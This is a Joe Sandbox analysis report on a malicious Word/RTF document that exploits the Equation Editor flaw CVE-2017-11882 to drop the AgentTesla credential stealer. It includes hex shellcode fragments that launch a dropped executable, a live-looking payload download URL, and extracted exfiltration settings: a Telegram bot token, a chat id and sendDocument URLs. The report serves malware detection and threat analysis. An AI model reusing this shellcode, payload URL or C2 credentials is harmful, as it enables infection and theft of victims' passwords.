Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ICPO07082299976.doc

Overview

General Information

Sample Name:ICPO07082299976.doc
Analysis ID:680478
MD5:088e55da11e301419586a37204f3a51c
SHA1:605322507a7fcde98442a58a10833de83e5025e5
SHA256:976993901c2dd38d833124be95073dca9af3466423c5de6b675bbcc7a8d5e4f6
Tags:doc
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Yara detected AgentTesla
Document contains OLE streams which likely are hidden ActiveX objects
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Document contains OLE streams with names of living off the land binaries
Uses the Telegram API (likely for C&C communication)
Allocates memory in foreign processes
Found potential equation exploit (CVE-2017-11882)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Office process drops PE file
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Document contains OLE streams with PE executables
Yara detected Generic Downloader
Machine Learning detection for dropped file
Found suspicious RTF objects
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Stores large binary data to the registry
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1516 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • Client.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Local\Temp\Client.exe" MD5: 7E2FF60FD955B39768565DFE645E49C0)
      • RegSvcs.exe (PID: 1152 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • EQNEDT32.EXE (PID: 2612 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 2024 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 1964 cmdline: cmd.exe /c%tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 2348 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: 7E2FF60FD955B39768565DFE645E49C0)
        • RegSvcs.exe (PID: 2656 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • EQNEDT32.EXE (PID: 2164 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 1136 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2244 cmdline: cmd.exe /c%tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 1920 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: 7E2FF60FD955B39768565DFE645E49C0)
        • RegSvcs.exe (PID: 2176 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "-624834641", "Chat URL": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument"}
SourceRuleDescriptionAuthorStrings
ICPO07082299976.docMAL_RTF_Embedded_OLE_PEDetects a suspicious string often used in PE files in a hex encoded object streamFlorian Roth
  • 0x25a:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465
  • 0x14a:$a3: 433a5c66616b65706174685c
  • 0x188:$a3: 433a5c66616b65706174685c
  • 0x1be:$m1: 4d5a90000300000004000000ffff
ICPO07082299976.docrtf_CVE_2018_0802Attempts to exploit CVE-2018-0802Rich Warren
  • 0x42e6:$equation: 45 71 75 61 74 69 6F 6E 2E 33
  • 0x652c:$equation: 45 71 75 61 74 69 6F 6E 2E 33
  • 0x5d0b:$header_and_shellcode: 030100030A0A08000133C0508D44245250EB7F636d642e657865202f6325746d70255c436c69656e742e6578652020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202026908B44242C662D51A8FFE02500
ICPO07082299976.docrtf_cve2017_11882Attempts to identify the exploit CVE 2017 11882John Davison
  • 0x7799:$headers: 31 63 30 30 30 30 30 30 30 32 30 30 39 65 63 34 61 39 30 30 30 30 30 30 30 30 30 30 30 30 30 30 63 38 61 37 35 63 30 30 63 34 65 65 35 62 30 30 30 30 30 30 30 30 30 30 30 33 30 31 30 31 30 33 ...
  • 0x77db:$font: 30 61 30 31 30 38 35 61 35 61
  • 0x783d:$winexec: 31 32 30 63 34 33 30 30
ICPO07082299976.docpackager_cve2017_11882Attempts to exploit CVE-2017-11882 using PackagerRich Warren
  • 0x77db:$font: 30 61 30 31 30 38 35 61 35 61
  • 0x42e6:$equation: 45 71 75 61 74 69 6F 6E 2E 33
  • 0x652c:$equation: 45 71 75 61 74 69 6F 6E 2E 33
  • 0xdc:$package: 50 61 63 6B 61 67 65
  • 0x77d1:$header_and_shellcode: 030101030a0a01085a5a636d642e657865202f6325746d70255c436c69656e742e657865202020202020202020202020202020202041120c4300
ICPO07082299976.docCVE_2017_11882_RTFDetects suspicious Microsoft Equation OLE contents as used in CVE-2017-11882Florian Roth
  • 0x7659:$s1: 4d6963726f736f6674204571756174696f6e20332e30
  • 0x7999:$s2: 4500710075006100740069006f006e0020004e00610074006900760065
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
  • 0x46819:$a13: get_DnsResolver
  • 0x95e8d:$a13: get_DnsResolver
  • 0xe0b4e:$a13: get_DnsResolver
  • 0x44ea7:$a20: get_LastAccessed
  • 0x9451b:$a20: get_LastAccessed
  • 0xdf1dc:$a20: get_LastAccessed
  • 0x4724e:$a27: set_InternalServerPort
  • 0x968c2:$a27: set_InternalServerPort
  • 0xe1537:$a27: set_InternalServerPort
  • 0x44fae:$a33: get_Clipboard
  • 0x94622:$a33: get_Clipboard
  • 0xdf2e3:$a33: get_Clipboard
  • 0x44fbc:$a34: get_Keyboard
  • 0x94630:$a34: get_Keyboard
  • 0xdf2f1:$a34: get_Keyboard
  • 0x463f7:$a35: get_ShiftKeyDown
  • 0x95a6b:$a35: get_ShiftKeyDown
  • 0xe06e0:$a35: get_ShiftKeyDown
  • 0x46408:$a36: get_AltKeyDown
  • 0x95a7c:$a36: get_AltKeyDown
  • 0xe06f1:$a36: get_AltKeyDown
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0x6680:$equation1: Equation Native
  • 0x6b80:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x31a0:$equation2: Microsoft Equation 3.0
  • 0x34e0:$equation2: Microsoft Equation 3.0
  • 0x68e0:$equation2: Microsoft Equation 3.0
  • 0x306f:$cmd: cmd
  • 0x34af:$cmd: cmd
  • 0xc0c:$exe: .exe
  • 0xc23:$exe: .exe
  • 0xc58:$exe: .exe
  • 0x14f8:$exe: .exe
  • 0x3072:$exe: .exe
  • 0x3085:$exe: .exe
  • 0x34b2:$exe: .exe
  • 0x35e9:$exe: .exe
  • 0x35fc:$exe: .exe
  • 0x3bc5:$exe: .exe
  • 0x420c:$exe: .exe
  • 0x4223:$exe: .exe
SourceRuleDescriptionAuthorStrings
0000000F.00000002.1003248820.00000000020EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000002.986609163.0000000002390000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 28 entries
            SourceRuleDescriptionAuthorStrings
            9.2.Client.exe.3169510.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              9.2.Client.exe.3169510.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                9.2.Client.exe.3169510.3.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30d41:$s10: logins
                • 0x307ae:$s11: credential
                • 0x2cd45:$g1: get_Clipboard
                • 0x2cd53:$g2: get_Keyboard
                • 0x2cd60:$g3: get_Password
                • 0x2e014:$g4: get_CtrlKeyDown
                • 0x2e024:$g5: get_ShiftKeyDown
                • 0x2e035:$g6: get_AltKeyDown
                9.2.Client.exe.3169510.3.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
                • 0x2e400:$a13: get_DnsResolver
                • 0x2cc3e:$a20: get_LastAccessed
                • 0x2ed5d:$a27: set_InternalServerPort
                • 0x2f0a9:$a30: set_GuidMasterKey
                • 0x2cd45:$a33: get_Clipboard
                • 0x2cd53:$a34: get_Keyboard
                • 0x2e024:$a35: get_ShiftKeyDown
                • 0x2e035:$a36: get_AltKeyDown
                • 0x2cd60:$a37: get_Password
                • 0x2d7d4:$a38: get_PasswordHash
                • 0x2e7df:$a39: get_DefaultCredentials
                10.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 9 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.22149.154.167.220491824432851779 08/08/22-17:18:57.172404
                  SID:2851779
                  Source Port:49182
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.22149.154.167.220491754432851779 08/08/22-17:18:22.152203
                  SID:2851779
                  Source Port:49175
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://109.206.241.81/htdocs/eZYWw.exeAvira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeAvira: detection malicious, Label: HEUR/AGEN.1251478
                  Source: ICPO07082299976.docReversingLabs: Detection: 73%
                  Source: ICPO07082299976.docAvira: detected
                  Source: http://109.206.241.81/htdocs/eZYWw.exeVirustotal: Detection: 15%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeReversingLabs: Detection: 19%
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeJoe Sandbox ML: detected
                  Source: 10.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 10.0.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "-624834641", "Chat URL": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument"}
                  Source: RegSvcs.exe.2656.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendMessage"}

                  Exploits

                  barindex
                  Source: Static RTF information: Object: 1 Offset: 00004308h
                  Source: Static RTF information: Object: 2 Offset: 0000654Eh
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484246/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484254/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49175 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.22:49177 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49179 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49182 version: TLS 1.2
                  Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdb source: Client.exe, 00000009.00000002.928225350.0000000000530000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\Microsoft.CodeAnalysis.Orchestrator.RunnableProjects.Localization.pdb source: Client.exe, 00000009.00000000.911511848.0000000000AC2000.00000020.00000001.01000000.00000003.sdmp, Client.exe, 0000000C.00000000.973051510.0000000001233000.00000020.00000001.01000000.00000003.sdmp, ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.dr, Client.exe.0.dr
                  Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdbd source: Client.exe, 00000009.00000002.928225350.0000000000530000.00000004.08000000.00040000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: Client.exe.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\Client.exe
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 162.159.134.233:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
